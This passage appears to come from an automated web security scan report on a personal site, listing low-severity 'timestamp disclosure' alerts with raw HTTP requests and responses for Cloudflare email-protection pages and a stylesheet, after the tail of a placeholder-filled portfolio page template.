          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
           <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Evidence
          998027574
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        25. GET https://beekmans.dev/cdn-cgi/l/email-protection
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          200170016, which evaluates to: 1976-05-05 19:46:56

          Request
          Request line and header section (250 bytes)
          GET https://beekmans.dev/cdn-cgi/l/email-protection HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev
          
          
          Request body (0 bytes)
          Response
          Status line and header section (226 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:13 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          X-Frame-Options: DENY
          Server: cloudflare
          CF-RAY: 6b94a32b6a450c09-AMS
          X-Content-Type-Options: nosniff
          
          
          Response body (4234 bytes)
          <!DOCTYPE html>
          <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
          <!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
          <!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
          <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
          <head>
          <title>Email Protection | Cloudflare</title>
          <meta charset="UTF-8" />
          <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
          <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />
          <meta name="robots" content="noindex, nofollow" />
          <meta name="viewport" content="width=device-width,initial-scale=1" />
          <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />
          <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->
          <style type="text/css">body{margin:0;padding:0}</style>
          
          
          <!--[if gte IE 10]><!-->
          <script>
            if (!navigator.cookieEnabled) {
              window.addEventListener('DOMContentLoaded', function () {
                var cookieEl = document.getElementById('cookie-alert');
                cookieEl.style.display = 'block';
              })
            }
          </script>
          <!--<![endif]-->
          
          
          </head>
          <body>
            <div id="cf-wrapper">
              <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div>
              <div id="cf-error-details" class="cf-error-details-wrapper">
                <div class="cf-wrapper cf-header cf-error-overview">
                  <h1 data-translate="block_headline">Email Protection</h1>
                  <h2 class="cf-subheadline"><span data-translate="unable_to_access">You are unable to access this email address</span> beekmans.dev</h2>
                </div><!-- /.header -->
          
                <div class="cf-section cf-wrapper">
                  <div class="cf-columns two">
                    <div class="cf-column">
                      <p>The website from which you got to this page is protected by Cloudflare. Email addresses on that page have been hidden in order to keep them from being accessed by malicious bots. <strong>You must enable Javascript in your browser in order to decode the e-mail address</strong>.</p>
                      <p>If you have a website and are interested in protecting it in a similar way, you can <a rel="noopener noreferrer" href="https://www.cloudflare.com/sign-up?utm_source=email_protection">sign up for Cloudflare</a>.</p>
                    </div>
          
                    <div class="cf-column">
                      <div class="grid_4">
                        <div class="rail">
                            <div class="panel">
                                <ul class="nobullets">
                                  <li><a rel="noopener noreferrer" class="modal-link-faq" href="https://support.cloudflare.com/hc/en-us/articles/200170016-What-is-Email-Address-Obfuscation-">How does Cloudflare protect email addresses on website from spammers?</a></li>
                                  <li><a rel="noopener noreferrer" class="modal-link-faq" href="https://support.cloudflare.com/hc/en-us/categories/200275218-Getting-Started">Can I sign up for Cloudflare?</a></li>
                              </ul>
                          </div>
                        </div>
                      </div>
                    </div>
                  </div>
                </div><!-- /.section -->
          
                <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300">
            <p class="text-13">
              <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">6b94a32b6a450c09</strong></span>
              <span class="cf-footer-separator sm:hidden">&bull;</span>
              <span class="cf-footer-item sm:block sm:mb-1"><span>Your IP</span>: 145.93.113.188</span>
              <span class="cf-footer-separator sm:hidden">&bull;</span>
              <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span>
              
            </p>
          </div><!-- /.error-footer -->
          
          
              </div><!-- /#cf-error-details -->
            </div><!-- /#cf-wrapper -->
          
            <script type="text/javascript">
            window._cf_translation = {};
            
            
          </script>
          
          </body>
          </html>
          
          Evidence
          200170016
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        26. GET https://beekmans.dev/cdn-cgi/l/email-protection
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          200275218, which evaluates to: 1976-05-07 01:00:18

          Request
          Request line and header section (250 bytes)
          GET https://beekmans.dev/cdn-cgi/l/email-protection HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev
          
          
          Request body (0 bytes)
          Response
          Status line and header section (226 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:13 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          X-Frame-Options: DENY
          Server: cloudflare
          CF-RAY: 6b94a32b6a450c09-AMS
          X-Content-Type-Options: nosniff
          
          
          Response body (4234 bytes)
          <!DOCTYPE html>
          <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
          <!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
          <!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
          <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
          <head>
          <title>Email Protection | Cloudflare</title>
          <meta charset="UTF-8" />
          <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
          <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />
          <meta name="robots" content="noindex, nofollow" />
          <meta name="viewport" content="width=device-width,initial-scale=1" />
          <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />
          <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->
          <style type="text/css">body{margin:0;padding:0}</style>
          
          
          <!--[if gte IE 10]><!-->
          <script>
            if (!navigator.cookieEnabled) {
              window.addEventListener('DOMContentLoaded', function () {
                var cookieEl = document.getElementById('cookie-alert');
                cookieEl.style.display = 'block';
              })
            }
          </script>
          <!--<![endif]-->
          
          
          </head>
          <body>
            <div id="cf-wrapper">
              <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div>
              <div id="cf-error-details" class="cf-error-details-wrapper">
                <div class="cf-wrapper cf-header cf-error-overview">
                  <h1 data-translate="block_headline">Email Protection</h1>
                  <h2 class="cf-subheadline"><span data-translate="unable_to_access">You are unable to access this email address</span> beekmans.dev</h2>
                </div><!-- /.header -->
          
                <div class="cf-section cf-wrapper">
                  <div class="cf-columns two">
                    <div class="cf-column">
                      <p>The website from which you got to this page is protected by Cloudflare. Email addresses on that page have been hidden in order to keep them from being accessed by malicious bots. <strong>You must enable Javascript in your browser in order to decode the e-mail address</strong>.</p>
                      <p>If you have a website and are interested in protecting it in a similar way, you can <a rel="noopener noreferrer" href="https://www.cloudflare.com/sign-up?utm_source=email_protection">sign up for Cloudflare</a>.</p>
                    </div>
          
                    <div class="cf-column">
                      <div class="grid_4">
                        <div class="rail">
                            <div class="panel">
                                <ul class="nobullets">
                                  <li><a rel="noopener noreferrer" class="modal-link-faq" href="https://support.cloudflare.com/hc/en-us/articles/200170016-What-is-Email-Address-Obfuscation-">How does Cloudflare protect email addresses on website from spammers?</a></li>
                                  <li><a rel="noopener noreferrer" class="modal-link-faq" href="https://support.cloudflare.com/hc/en-us/categories/200275218-Getting-Started">Can I sign up for Cloudflare?</a></li>
                              </ul>
                          </div>
                        </div>
                      </div>
                    </div>
                  </div>
                </div><!-- /.section -->
          
                <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300">
            <p class="text-13">
              <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">6b94a32b6a450c09</strong></span>
              <span class="cf-footer-separator sm:hidden">&bull;</span>
              <span class="cf-footer-item sm:block sm:mb-1"><span>Your IP</span>: 145.93.113.188</span>
              <span class="cf-footer-separator sm:hidden">&bull;</span>
              <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span>
              
            </p>
          </div><!-- /.error-footer -->
          
          
              </div><!-- /#cf-error-details -->
            </div><!-- /#cf-wrapper -->
          
            <script type="text/javascript">
            window._cf_translation = {};
            
            
          </script>
          
          </body>
          </html>
          
          Evidence
          200275218
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        27. GET https://beekmans.dev/cdn-cgi/styles/cf.errors.css
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          1376755637, which evaluates to: 2013-08-17 18:07:17

          Request
          Request line and header section (279 bytes)
          GET https://beekmans.dev/cdn-cgi/styles/cf.errors.css HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev/cdn-cgi/l/email-protection
          
          
          Request body (0 bytes)
          Response
          Status line and header section (416 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:08 GMT
          Content-Type: text/css
          Content-Length: 23688
          Connection: keep-alive
          Last-Modified: Wed, 01 Dec 2021 12:20:23 GMT
          ETag: "61a76887-5c88"
          Server: cloudflare
          CF-RAY: 6b94a4806f2d0c09-AMS
          X-Frame-Options: DENY
          X-Content-Type-Options: nosniff
          Expires: Mon, 06 Dec 2021 11:56:08 GMT
          Cache-Control: max-age=7200
          Cache-Control: public
          Accept-Ranges: bytes
          
          
          Response body (23688 bytes)
          #cf-wrapper a,#cf-wrapper abbr,#cf-wrapper article,#cf-wrapper aside,#cf-wrapper b,#cf-wrapper big,#cf-wrapper blockquote,#cf-wrapper body,#cf-wrapper canvas,#cf-wrapper caption,#cf-wrapper center,#cf-wrapper cite,#cf-wrapper code,#cf-wrapper dd,#cf-wrapper del,#cf-wrapper details,#cf-wrapper dfn,#cf-wrapper div,#cf-wrapper dl,#cf-wrapper dt,#cf-wrapper em,#cf-wrapper embed,#cf-wrapper fieldset,#cf-wrapper figcaption,#cf-wrapper figure,#cf-wrapper footer,#cf-wrapper form,#cf-wrapper h1,#cf-wrapper h2,#cf-wrapper h3,#cf-wrapper h4,#cf-wrapper h5,#cf-wrapper h6,#cf-wrapper header,#cf-wrapper hgroup,#cf-wrapper html,#cf-wrapper i,#cf-wrapper iframe,#cf-wrapper img,#cf-wrapper label,#cf-wrapper legend,#cf-wrapper li,#cf-wrapper mark,#cf-wrapper menu,#cf-wrapper nav,#cf-wrapper object,#cf-wrapper ol,#cf-wrapper output,#cf-wrapper p,#cf-wrapper pre,#cf-wrapper s,#cf-wrapper samp,#cf-wrapper section,#cf-wrapper small,#cf-wrapper span,#cf-wrapper strike,#cf-wrapper strong,#cf-wrapper sub,#cf-wrapper summary,#cf-wrapper sup,#cf-wrapper table,#cf-wrapper tbody,#cf-wrapper td,#cf-wrapper tfoot,#cf-wrapper th,#cf-wrapper thead,#cf-wrapper tr,#cf-wrapper tt,#cf-wrapper u,#cf-wrapper ul{margin:0;padding:0;border:0;font:inherit;font-size:100%;text-decoration:none;vertical-align:baseline}#cf-wrapper a img{border:none}#cf-wrapper article,#cf-wrapper aside,#cf-wrapper details,#cf-wrapper figcaption,#cf-wrapper figure,#cf-wrapper footer,#cf-wrapper header,#cf-wrapper hgroup,#cf-wrapper menu,#cf-wrapper nav,#cf-wrapper section,#cf-wrapper summary{display:block}#cf-wrapper .cf-columns:after,#cf-wrapper .cf-columns:before,#cf-wrapper .cf-section:after,#cf-wrapper .cf-section:before,#cf-wrapper .cf-wrapper:after,#cf-wrapper .cf-wrapper:before,#cf-wrapper .clearfix:after,#cf-wrapper .clearfix:before,#cf-wrapper section:after,#cf-wrapper section:before{content:" ";display:table}#cf-wrapper .cf-columns:after,#cf-wrapper .cf-section:after,#cf-wrapper .cf-wrapper:after,#cf-wrapper .clearfix:after,#cf-wrapper section:after{clear:both}#cf-wrapper{display:block;margin:0;padding:0;position:relative;text-align:left;width:100%;z-index:999999999;color:#404040!important;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Helvetica Neue,Arial,sans-serif!important;font-size:15px!important;line-height:1.5!important;text-decoration:none!important;letter-spacing:normal;-webkit-tap-highlight-color:rgba(246,139,31,.3);-webkit-font-smoothing:antialiased}#cf-wrapper .cf-section,#cf-wrapper section{background:0 0;display:block;margin-bottom:2em;margin-top:2em}#cf-wrapper .cf-wrapper{margin-left:auto;margin-right:auto;width:90%}#cf-wrapper .cf-columns{display:block;list-style:none;padding:0;width:100%}#cf-wrapper .cf-columns img,#cf-wrapper .cf-columns input,#cf-wrapper .cf-columns object,#cf-wrapper .cf-columns select,#cf-wrapper .cf-columns textarea{max-width:100%}#cf-wrapper .cf-columns>.cf-column{float:left;padding-bottom:45px;width:100%;box-sizing:border-box}@media screen and (min-width:49.2em){#cf-wrapper .cf-columns.cols-2>.cf-column:nth-child(n+3),#cf-wrapper .cf-columns.cols-3>.cf-column:nth-child(n+4),#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(n+3),#cf-wrapper .cf-columns.four>.cf-column:nth-child(n+3),#cf-wrapper .cf-columns.three>.cf-column:nth-child(n+4),#cf-wrapper .cf-columns.two>.cf-column:nth-child(n+3){padding-top:67.5px}#cf-wrapper .cf-columns>.cf-column{padding-bottom:0}#cf-wrapper .cf-columns.cols-2>.cf-column,#cf-wrapper .cf-columns.cols-4>.cf-column,#cf-wrapper .cf-columns.four>.cf-column,#cf-wrapper .cf-columns.two>.cf-column{padding-left:0;padding-right:22.5px;width:50%}#cf-wrapper .cf-columns.cols-2>.cf-column:nth-child(2n),#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(2n),#cf-wrapper .cf-columns.four>.cf-column:nth-child(2n),#cf-wrapper .cf-columns.two>.cf-column:nth-child(2n){padding-left:22.5px;padding-right:0}#cf-wrapper .cf-columns.cols-2>.cf-column:nth-child(odd),#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(odd),#cf-wrapper .cf-columns.four>.cf-column:nth-child(odd),#cf-wrapper .cf-columns.two>.cf-column:nth-child(odd){clear:left}#cf-wrapper .cf-columns.cols-3>.cf-column,#cf-wrapper .cf-columns.three>.cf-column{padding-left:30px;width:33.3333333333333%}#cf-wrapper .cf-columns.cols-3>.cf-column:first-child,#cf-wrapper .cf-columns.cols-3>.cf-column:nth-child(3n+1),#cf-wrapper .cf-columns.three>.cf-column:first-child,#cf-wrapper .cf-columns.three>.cf-column:nth-child(3n+1){clear:left;padding-left:0;padding-right:30px}#cf-wrapper .cf-columns.cols-3>.cf-column:nth-child(3n+2),#cf-wrapper .cf-columns.three>.cf-column:nth-child(3n+2){padding-left:15px;padding-right:15px}#cf-wrapper .cf-columns.cols-3>.cf-column:nth-child(-n+3),#cf-wrapper .cf-columns.three>.cf-column:nth-child(-n+3){padding-top:0}}@media screen and (min-width:66em){#cf-wrapper .cf-columns>.cf-column{padding-bottom:0}#cf-wrapper .cf-columns.cols-4>.cf-column,#cf-wrapper .cf-columns.four>.cf-column{padding-left:33.75px;width:25%}#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(odd),#cf-wrapper .cf-columns.four>.cf-column:nth-child(odd){clear:none}#cf-wrapper .cf-columns.cols-4>.cf-column:first-child,#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(4n+1),#cf-wrapper .cf-columns.four>.cf-column:first-child,#cf-wrapper .cf-columns.four>.cf-column:nth-child(4n+1){clear:left;padding-left:0;padding-right:33.75px}#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(4n+2),#cf-wrapper .cf-columns.four>.cf-column:nth-child(4n+2){padding-left:11.25px;padding-right:22.5px}#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(4n+3),#cf-wrapper .cf-columns.four>.cf-column:nth-child(4n+3){padding-left:22.5px;padding-right:11.25px}#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(n+5),#cf-wrapper .cf-columns.four>.cf-column:nth-child(n+5){padding-top:67.5px}#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(-n+4),#cf-wrapper .cf-columns.four>.cf-column:nth-child(-n+4){padding-top:0}}#cf-wrapper a{background:0 0;border:0;color:#2f7bbf;outline:0;text-decoration:none;-webkit-transition:all .15s ease;transition:all .15s ease}#cf-wrapper a:hover{background:0 0;border:0;color:#f68b1f}#cf-wrapper a:focus{background:0 0;border:0;color:#62a1d8;outline:0}#cf-wrapper a:active{background:0 0;border:0;color:#c16508;outline:0}#cf-wrapper h1,#cf-wrapper h2,#cf-wrapper h3,#cf-wrapper h4,#cf-wrapper h5,#cf-wrapper h6,#cf-wrapper p{color:#404040;margin:0;padding:0}#cf-wrapper h1,#cf-wrapper h2,#cf-wrapper h3{font-weight:400}#cf-wrapper h4,#cf-wrapper h5,#cf-wrapper h6,#cf-wrapper strong{font-weight:600}#cf-wrapper h1{font-size:36px;line-height:1.2}#cf-wrapper h2{font-size:30px;line-height:1.3}#cf-wrapper h3{font-size:25px;line-height:1.3}#cf-wrapper h4{font-size:20px;line-height:1.3}#cf-wrapper h5{font-size:15px}#cf-wrapper h6{font-size:13px}#cf-wrapper ol,#cf-wrapper ul{list-style:none;margin-left:3em}#cf-wrapper ul{list-style-type:disc}#cf-wrapper ol{list-style-type:decimal}#cf-wrapper em{font-style:italic}#cf-wrapper .cf-subheadline{color:#999;font-weight:300}#cf-wrapper .cf-text-error{color:#bd2426}#cf-wrapper .cf-text-success{color:#9bca3e}#cf-wrapper ol+h2,#cf-wrapper ol+h3,#cf-wrapper ol+h4,#cf-wrapper ol+h5,#cf-wrapper ol+h6,#cf-wrapper ol+p,#cf-wrapper p+dl,#cf-wrapper p+ol,#cf-wrapper p+p,#cf-wrapper p+table,#cf-wrapper p+ul,#cf-wrapper ul+h2,#cf-wrapper ul+h3,#cf-wrapper ul+h4,#cf-wrapper ul+h5,#cf-wrapper ul+h6,#cf-wrapper ul+p{margin-top:1.5em}#cf-wrapper h1+p,#cf-wrapper p+h1,#cf-wrapper p+h2,#cf-wrapper p+h3,#cf-wrapper p+h4,#cf-wrapper p+h5,#cf-wrapper p+h6{margin-top:1.25em}#cf-wrapper h1+h2,#cf-wrapper h1+h3,#cf-wrapper h2+h3,#cf-wrapper h3+h4,#cf-wrapper h4+h5{margin-top:.25em}#cf-wrapper h2+p{margin-top:1em}#cf-wrapper h1+h4,#cf-wrapper h1+h5,#cf-wrapper h1+h6,#cf-wrapper h2+h4,#cf-wrapper h2+h5,#cf-wrapper h2+h6,#cf-wrapper h3+h5,#cf-wrapper h3+h6,#cf-wrapper h3+p,#cf-wrapper h4+p,#cf-wrapper h5+ol,#cf-wrapper h5+p,#cf-wrapper h5+ul{margin-top:.5em}#cf-wrapper .cf-btn{background-color:transparent;border:1px solid #999;color:#404040;font-size:14px;font-weight:400;line-height:1.2;margin:0;padding:.6em 1.33333em .53333em;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;display:-moz-inline-stack;display:inline-block;vertical-align:middle;zoom:1;border-radius:2px;box-sizing:border-box;-webkit-transition:all .2s ease;transition:all .2s ease}#cf-wrapper .cf-btn:hover{background-color:#bfbfbf;border:1px solid #737373;color:#fff}#cf-wrapper .cf-btn:focus{color:inherit;outline:0;box-shadow:inset 0 0 4px rgba(0,0,0,.3)}#cf-wrapper .cf-btn.active,#cf-wrapper .cf-btn:active{background-color:#bfbfbf;border:1px solid #404040;color:#272727}#cf-wrapper .cf-btn::-moz-focus-inner{padding:0;border:0}#cf-wrapper .cf-btn .cf-caret{border-top-color:currentColor;margin-left:.25em;margin-top:.18333em}#cf-wrapper .cf-btn-primary{background-color:#2f7bbf;border:1px solid transparent;color:#fff}#cf-wrapper .cf-btn-primary:hover{background-color:#62a1d8;border:1px solid #2f7bbf;color:#fff}#cf-wrapper .cf-btn-primary.active,#cf-wrapper .cf-btn-primary:active,#cf-wrapper .cf-btn-primary:focus{background-color:#62a1d8;border:1px solid #163959;color:#fff}#cf-wrapper .cf-btn-danger,#cf-wrapper .cf-btn-error,#cf-wrapper 